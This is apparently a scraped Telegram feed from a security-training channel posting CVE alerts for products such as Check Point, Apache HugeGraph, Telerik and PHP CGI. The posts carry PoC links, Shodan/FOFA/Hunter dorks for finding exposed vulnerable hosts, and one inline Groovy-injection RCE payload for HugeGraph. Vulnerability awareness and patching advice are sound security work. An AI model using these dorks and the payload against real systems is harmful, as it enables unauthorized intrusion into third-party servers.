Brut Security
15.2K subscribers
967 photos
76 videos
292 files
1.01K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
Media is too big
VIEW IN TELEGRAM
🚨Check Point Quantum Gateway - CVE-2024-24919🚨

πŸ‘‰CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.

πŸ”—Github POC: https://github.com/seed1337/CVE-2024-24919-POC
πŸ‘2🀯1
Media is too big
VIEW IN TELEGRAM
🚨Adobe Coldfusion XSS - CVE-2023-44352🚨

πŸ‘‰Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
.
.
.
πŸ”—poc: https://buff.ly/3V2F8tD
πŸ‘2🀯2
🚨CVE-2024-4956:Nexus Repository Flaw Exposed🚨

⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.

πŸ‘‰Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"

POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

πŸ’₯POC: https://lnkd.in/g_v4h7Cg

πŸ‘‰Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"
🀯8
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ“’Use This Extensions, it will help you to Extract all domains From any website.

πŸ”ΈLink Extractor: https://link-extractor.cssnr.com
πŸ”ΈLink Gopher: https://github.com/az0/linkgopher
πŸ‘2🀯2
🚨CVE-2024-27348: RCE in Apache HugeGraph-Server.

πŸ“’Remedy: Upgrade to version 1.3.0 to mitigate.

πŸ˜‰Payload:
{"gremlin":"def result = \"uname -a\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(\"BrutSecurity\"+ result);"
}


πŸ‘ŒVideo: https://youtu.be/32cyeCd4DEc
πŸ‘1
🚨Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)🚨

πŸ“’PoC: https://github.com/sinsinology/CVE-2024-4358

⚠Detailed Analysis from @SinSinology https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/

πŸ‘‰Dorks:
πŸ”ΈHunter: /product.name="Telerik report server"
πŸ”ΈFOFA: app="Telerik-Report-Server"
πŸ”ΈSHODAN: http.title:"Telerik report server"
πŸ‘2
Brut Security pinned Deleted message
Media is too big
VIEW IN TELEGRAM
🚨Android SSL Pinning Bypass using Noxer🚨

πŸ‘‰Automate your Android penetration testing lab setup using Nox Emulator. Noxer is a powerful Python script designed for automating Android penetration testing tasks within the Nox Player emulator. It simplifies setup, enhances stability, manages Frida Server, removes unwanted bloatware, integrates BurpSuite certificates, and much more!

πŸ”—Noxer: https://buff.ly/4b0gxM4
πŸ”₯4
cve_2024_4577.py
828 B
πŸ”₯3
This media is not supported in your browser
VIEW IN TELEGRAM
🚨CVE-2024-4577: PHP CGI Argument Injection Vulnerability🚨

⚠Dorks:
πŸ”ΈHunter: header.server="PHP"
πŸ”ΈFOFA: server="PHP"
πŸ”ΈSHODAN: server: PHP
🀯5πŸ‘2πŸ”₯2
Last Call! Hurry Up
🀣21πŸ€“3😐2
TestCases.pdf
711.3 KB
πŸ‘2🐳1
Which of the following is used for banner grabbing?
Anonymous Quiz
48%
Telnet
12%
FTP
19%
SSH
21%
Wireshark
πŸ‘1